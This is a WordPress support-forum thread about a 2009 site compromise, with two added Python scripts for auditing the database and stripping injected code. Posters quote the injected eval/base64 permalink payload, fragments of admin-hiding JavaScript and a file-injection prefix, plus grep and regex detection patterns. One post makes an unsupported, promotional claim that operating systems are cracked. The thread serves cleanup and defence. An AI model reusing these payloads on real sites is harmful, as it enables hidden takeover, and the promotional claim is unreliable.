[resolved] eval(base64_decode(...)) in permalinks (13 posts)

  1. benanne
    Posted 6 years ago #

    I figure my blog got hacked. It's my own fault for being too lazy to upgrade, but I thought I'd describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

    Since this morning, I noticed that my "permalinks" setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

    When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called "JohnFisher76" also had admin rights. I'd had a few spam registrations before so I hadn't paid attention to this. I wish I had...

    This user's username was... a bit weird. It looked like this:

    <div id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
        var t=document.getElementById("user_superuser");
        var tags = document.getElementsByTagName("H3");
        var s = " shown below";
        for (var i = 0; i < tags.length; i++) {
            var t=tags[i].innerHTML;
            var h=tags[i];
            s =(parseInt(t)-1)+s;
            t = document.createTextNode(s);
        var arr=document.getElementsByTagName("ul");
        for(var i in arr) if(arr[i].className=="subsubsub"){
            var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
            var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");

    I haven't bothered to try and interpret what this does, but I guess it's used to hide the fact that there is another administrator in the admin panel. I don't know how this user managed to acquire admin rights though.

    Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that's fixed it. I hope this thing hasn't left anything else behind that could come back to haunt me...

  2. riis
    Posted 6 years ago #


    I've experienced the same thing today. I visited my site yesterday and everything was fine. Today everything is messed up. How did you get rid of the permalink problems?


  3. benanne
    Posted 6 years ago #

    I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don't think that had any effect.

    At any rate, it can't hurt to search the "options" table for any reference to "eval" or "base64" and clean that up. It also appeared in a row in "options" called "rewrite_rules", I think. But that disappeared once I changed the setting back.

    As I said, I don't know if this has caused any other damage. The changed permalink setting seems rather to have been put in place to make further hacks easier to apply, although I have no idea how.

  4. lexthoonen
    Posted 6 years ago #

    Check this thread:

    and upgrade WordPress

  5. benanne
    Posted 6 years ago #

    Thanks, that is indeed exactly the same problem as the one I had. Maybe the extra information about the rogue user with administrator rights is still interesting, though.

  6. jekket
    Posted 6 years ago #

    I've just cleaned this stuff in "permalinks" and changed my admin password.

    All works.

    P.S. Do backups - they save you time

  7. benanne
    Posted 6 years ago #

    If I were you, I would check my user list to see if there are any admins in there that shouldn't be there...

  8. Roy
    Posted 6 years ago #

    Thread number three

    It seems that this already started a couple of weeks ago, judging by the oldest thread. Some automatic attack, I guess.

  9. chabotjeff
    Posted 6 years ago #

    My site got nailed too. I didn't think anything of it when I had a couple of "admin" users added to the site. Thought it was just spam. But I had two additional "admins" with "contributor" status and they were able to change the Permalinks URL structure. Argghh.

  10. Emilian Robert Vicol
    Posted 6 years ago #

    problem solved ... http://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/

    in wp_options table, clear the row named _transient_rewrite_rules and set permalink from wp config again !!!

    check all your database for infection:

    from ssh, use grep and search for particular strings in all databases on the server:

    grep -H -r "eval(base64_decode" /var/lib/mysql
    grep -H -r "var setUserName = function" /var/lib/mysql

    have a nice day ...
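    The checks the posts above describe by hand (look in the options table for "eval"/"base64", look in rewrite_rules and _transient_rewrite_rules, and count the administrators in the database rather than trusting the admin page) can be run as one audit. The script below is an added example, not code from the thread; it works on constructed rows shaped like wp_options (option_name, option_value), wp_users (ID, user_login) and wp_usermeta (user_id, meta_key, meta_value), so it runs offline; point the same functions at rows fetched from a real database to audit a site.

```python
import re

# Constructed sample rows, not dumped from any site in the thread. The poisoned
# permalink value is the one benanne quotes in post 1; the rogue user's login is
# the start of the script he pasted.
SAMPLE_OPTIONS = [  # wp_options: (option_name, option_value)
    ("siteurl", "http://example.invalid"),
    ("permalink_structure",
     "/%postname%/${eval(base64_decode($_SERVER[HTTP_REFERER]))}"),
    ("_transient_rewrite_rules",
     'a:1:{s:10:"([^/]+)/?$";s:72:"index.php?name=$matches[1]'
     '${eval(base64_decode($_SERVER[HTTP_REFERER]))}";}'),
    ("blogname", "My Blog"),
]
SAMPLE_USERS = [  # wp_users: (ID, user_login)
    (1, "benanne"),
    (2, "spamreg42"),
    (3, '<div id="user_superuser"><script language="JavaScript">var setUserName = function(){'),
]
SAMPLE_USERMETA = [  # wp_usermeta: (user_id, meta_key, meta_value)
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'),
    (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

# Strings the thread associates with this compromise: the eval/base64 permalink
# payload, PHP superglobal access, and script markup where plain text belongs.
TAINT_RE = re.compile(r"eval\s*\(\s*base64_decode|\$_SERVER\[|<script", re.IGNORECASE)
ROLE_RE = re.compile(r's:\d+:"([a-z_]+)";b:1;')   # roles inside serialized wp_capabilities
MARKUP_RE = re.compile(r"<[a-zA-Z/]")               # a tag inside a user_login


def tainted_options(options):
    """Names of wp_options rows whose value carries a suspicious string."""
    return [name for name, value in options if TAINT_RE.search(value)]


def roles_of(meta_value):
    """Role names granted by a serialized wp_capabilities value."""
    return set(ROLE_RE.findall(meta_value))


def administrators(usermeta):
    """Sorted user IDs whose wp_capabilities include 'administrator'."""
    return sorted(uid for uid, key, value in usermeta
                  if key == "wp_capabilities" and "administrator" in roles_of(value))


def users_with_markup(users):
    """User IDs whose login contains a tag, as the hidden admin's did."""
    return [uid for uid, login in users if MARKUP_RE.search(login)]


def audit(options, users, usermeta, known_admins):
    """Compare the database against the admins the owner expects to see."""
    admins = administrators(usermeta)
    return {
        "tainted_options": tainted_options(options),
        "admin_count": len(admins),
        "unexpected_admins": sorted(set(admins) - set(known_admins)),
        "logins_with_markup": users_with_markup(users),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_OPTIONS, SAMPLE_USERS, SAMPLE_USERMETA, known_admins=[1])
    for key, value in report.items():
        print(f"{key}: {value}")
```

The admin count comes from the serialized wp_capabilities rows, which is why it cannot be hidden by a script injected into the users page: the UI is a view of the database, and the database is what to check. Any option name the audit reports should be reset (permalink_structure back to the default, the transient rewrite rules deleted) after the unexpected administrator has been removed, otherwise the rules are regenerated from the poisoned structure.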

  11. jremillard
    Posted 6 years ago #

    Well, happy? to say that it's not your fault!

    The hacks are coming from lower layers than WP itself; we suspect the OSes themselves are cracked.

    Frankly, the only 'real' way to monitor and know if you have been hacked would be to monitor for malware, which we offer for free at: http://www.sitesecuritymonitor.com

    We also offer a free WP security plugin, to lock down all versions of WordPress. This works in 98% of the cases (download here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ) - however in this case, if you are hosted w/ GoDaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution), the plugin wouldn't help much


  12. 3stripe
    Posted 6 years ago #

    I have a similar problem on Dreamhost, all of my WP files have been injected with this at the start:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f.... etc

    @jremillard, do you think I'm being hacked via WordPress, or some other way?

    So sick of this happening :(


  13. James Huff
    Support Team Rep.
    Posted 6 years ago #

    The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent "in the clear" via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you're on a PC or Cyberduck if you're on a Mac.

    To clean out the current hack, carefully follow this guide:
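    The file-level variant 3stripe and James Huff describe, a prefix of the form <?php /**/ eval(base64_decode("...")); ?> written to the top of every .php file, is easy to find and strip mechanically. The scanner below is an added example, not part of this thread or of any cleanup guide; it assumes only the prefix shape quoted in post 12, builds a constructed temporary tree of two infected files and one clean file so it runs offline, decodes the base64 argument purely for inspection (nothing decoded is ever executed), and keeps a .infected.bak copy of each file it cleans.

```python
import base64
import os
import re
import tempfile

# Matches the injected prefix 3stripe quotes: <?php /**/ eval(base64_decode("...")); ?>
# Only the form with a literal base64 string is recognised; a variant that builds
# the string some other way would need its own pattern.
INJECT_RE = re.compile(
    r'<\?php\s*/\*\*/\s*eval\s*\(\s*base64_decode\s*\(\s*'
    r'["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?\s*(?:\?>)?[ \t]*\n?'
)


def decode_blob(blob):
    """Decode the base64 argument for inspection only; returns None if it is not base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (ValueError, TypeError):
        return None


def scan_text(text):
    """(match, decoded payload) if the injected prefix is present, else None."""
    m = INJECT_RE.search(text)
    if not m:
        return None
    return m, decode_blob(m.group(1))


def scan_file(path):
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        head = fh.read(8192)          # the injection sits at the top of the file
    found = scan_text(head)
    if found is None:
        return None
    m, decoded = found
    return {"path": path, "offset": m.start(), "b64_len": len(m.group(1)),
            "payload_preview": (decoded or "")[:60]}


def scan_tree(root):
    """Every .php file under root that carries the injected prefix."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                hit = scan_file(os.path.join(dirpath, name))
                if hit:
                    hits.append(hit)
    return sorted(hits, key=lambda h: h["path"])


def strip_injection(text):
    """Remove the first injected prefix; returns (cleaned_text, changed)."""
    cleaned, n = INJECT_RE.subn("", text, count=1)
    return cleaned, n == 1


def clean_file(path):
    """Strip the prefix in place, keeping the original as path + '.infected.bak'."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    cleaned, changed = strip_injection(text)
    if changed:
        os.replace(path, path + ".infected.bak")   # keep the original for forensics
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(cleaned)
    return changed


# Constructed sample tree: two infected files and one clean one. The payload is a
# harmless echo, chosen so the decoded preview is readable.
SAMPLE_PAYLOAD = base64.b64encode(b'echo "constructed sample payload";').decode()
SAMPLE_PREFIX = '<?php /**/ eval(base64_decode("%s")); ?>\n' % SAMPLE_PAYLOAD
CLEAN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"


def build_sample_tree():
    root = tempfile.mkdtemp(prefix="wp_scan_")
    os.makedirs(os.path.join(root, "wp-content", "themes"))
    files = {
        "index.php": SAMPLE_PREFIX + CLEAN_INDEX,
        "wp-config.php": SAMPLE_PREFIX + "<?php\ndefine('DB_NAME', 'wp');\n",
        os.path.join("wp-content", "themes", "functions.php"):
            "<?php\nfunction theme_setup() {}\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for hit in scan_tree(root):
        print(hit["path"], "payload:", hit["payload_preview"])
    print("cleaned:", [clean_file(h["path"]) for h in scan_tree(root)])
    print("remaining:", scan_tree(root))
```

Run scan_tree against the document root before cleaning and again afterwards; a non-empty second result means a variant the pattern does not cover. Cleaning the files without also changing the FTP password and moving to SFTP, as the post above advises, only buys time until the next write.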

